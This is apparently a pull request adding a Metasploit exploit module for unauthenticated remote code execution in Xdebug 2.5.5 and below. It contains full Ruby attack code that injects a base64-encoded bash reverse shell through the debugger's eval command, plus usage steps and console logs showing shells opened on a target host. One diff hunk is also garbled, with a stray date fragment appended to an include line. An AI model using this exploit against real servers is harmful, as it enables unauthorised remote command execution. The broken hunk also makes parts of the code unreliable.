### PR TITLE
Xdebug < 2.5.5 Remote Code Execution

### DIFF
--- a/modules/exploits/unix/webapp/xdebug_rce.rb
+++ b/modules/exploits/unix/webapp/xdebug_rce.rb
@@ -5,7 +5,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpClient 2017-09-17 ',
   include Rex::Proto::Http
   def initialize(info = {})
 	super(update_info(info,
@@ -13,6 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description' => %q{
        'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
       },
+       'DisclosureDate' => ' 2017-09-17 ',	 
       'Author' => [
 	'Ricter Zheng', #Discovery https://twitter.com/RicterZ     
         'Shaksham Jaiswal', #MinatoTW

--- a/modules/exploits/unix/webapp/xdebug_rce.rb
+++ b/modules/exploits/unix/webapp/xdebug_rce.rb
@@ -1,0 +1,116 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http
+  def initialize(info = {})
+	super(update_info(info,
+      'Name' => 'xdebug Unauthenticated OS Command Execution',
+      'Description' => %q{
+       'Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.' 
+      },
+      'Author' => [
+	'Ricter Zheng', #Discovery https://twitter.com/RicterZ     
+        'Shaksham Jaiswal', #MinatoTW
+	'Mumbai' #Austin Hudson
+      ],
+      'References' => [
+        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
+	['URL', 'https://paper.seebug.org/397/']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => [ARCH_CMD],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'cmd/unix/reverse_bash'
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options(
+      [
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+	OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+	OptAddress.new('RHOST', [true, "Target address"]),
+	OptInt.new('RPORT', [true, "Target port", 80])  
+      ]
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+	'uri' => datastore["PATH"],
+        'method' => 'GET'
+      })
+
+      vprint_line "Request send\n#{res.headers}"
+      if res && res.headers["Xdebug"]
+	print_good("Looks like remote server has xdebug enabled\n")
+        return Exploit::CheckCode::Detected
+      else
+        return Exploit::CheckCode::Safe
+      end
+      rescue Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+   begin
+    check	   
+    srvhost = datastore["SRVHOST"]
+    srvport = datastore["SRVPORT"]
+    rhost = datastore["RHOST"]
+    rport = datastore["RPORT"]
+    lhost = datastore["LHOST"]
+    uri = datastore["PATH"]
+    cmd= "eval -i 1 -- "+ Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")")+"\x00"
+    print_status("Sending payload...... ")
+    vprint_line("Payload sent-#{cmd}")
+    webserv=Thread.new do
+    server=Rex::Socket::TcpServer.create(
+		    'LocalPort' => srvport,
+		    'LocalHost' => srvhost,
+		    'Context'   =>
+		           {
+			       'Msf'        => framework,
+			       'MsfExploit' => self
+			   }
+	    )
+    	client=server.accept 
+	print_status("Waiting for client response.....")
+	data=client.recv(1024)
+	print_status("Received data.....")
+    	vprint_line(data)
+	client.write(cmd)
+    	client.close
+	server.close
+	webserv.exit
+    ensure
+        webserv.exit	    
+    end
+    res=send_request_cgi({
+	    'uri' => datastore["PATH"],
+	    'method' => 'GET',
+	    'headers' => {
+		    'X-Forwarded-For' => "#{lhost}" 
+	    },
+	    'vars_get' => {
+		    'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+	    }
+    })
+end
+  end
+end  
+


### PR DESCRIPTION
Xdebug is a PHP debugging tool that supports remote debugging of PHP code on the server via source code.
This module exploits the RCE vulnerability and gives a command shell back.

- Source: https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface

- Documentation: https://xdebug.org/docs-dbgp.php

- Tested on: Xdebug version 2.5.5

List the steps needed to make sure this thing works

-  Start `msfconsole`
-  `use exploits/unix/http/xdebug_rce`
-  `check`
-  `set RHOST 10.10.10.83` 
-   `set LHOST 10.10.14.197`
-   `exploit`

**Example Outputs**

- Check

```msf > use exploits/unix/http/xdebug_rce
msf exploit(unix/http/xdebug_rce) > set RHOST 10.10.10.83
RHOST => 10.10.10.83
msf exploit(unix/http/xdebug_rce) > set LHOST tun0
LHOST => tun0
msf exploit(unix/http/xdebug_rce) > check

[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 The target service is running, but could not be validated.
msf exploit(unix/http/xdebug_rce) > ```



- Run


msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload...... 
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
[*] Command shell session 1 opened (10.10.14.197:4444 -> 10.10.10.83:36628) at 2018-04-23 20:45:41 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

- Run verbose output

msf exploit(unix/http/xdebug_rce) > set verbose true
verbose => true
msf exploit(unix/http/xdebug_rce) > run

[*] Started reverse TCP handler on 10.10.14.197:4444 
Request send
Date: Mon, 23 Apr 2018 15:16:56 GMT
Server: Apache
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Length: 314
Content-Type: text/html; charset=UTF-8


[+] 10.10.10.83:80 - Looks like remote server has xdebug enabled

[*] 10.10.10.83:80 - Sending payload...... 
Payload sent-eval -i 1 -- c3lzdGVtKCIgYmFzaCAtYyAnMDwmMTkyLTtleGVjIDE5Mjw+L2Rldi90Y3AvMTAuMTAuMTQuMTk3LzQ0NDQ7c2ggPCYxOTIgPiYxOTIgMj4mMTkyJyIp
[*] 10.10.10.83:80 - Waiting for client response.....
[*] 10.10.10.83:80 - Received data.....
490<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.1.12" protocol_version="1.0" appid="1179" idekey="jtGjvfApYD"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] Command shell session 2 opened (10.10.14.197:4444 -> 10.10.10.83:36676) at 2018-04-23 20:46:56 +0530

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)```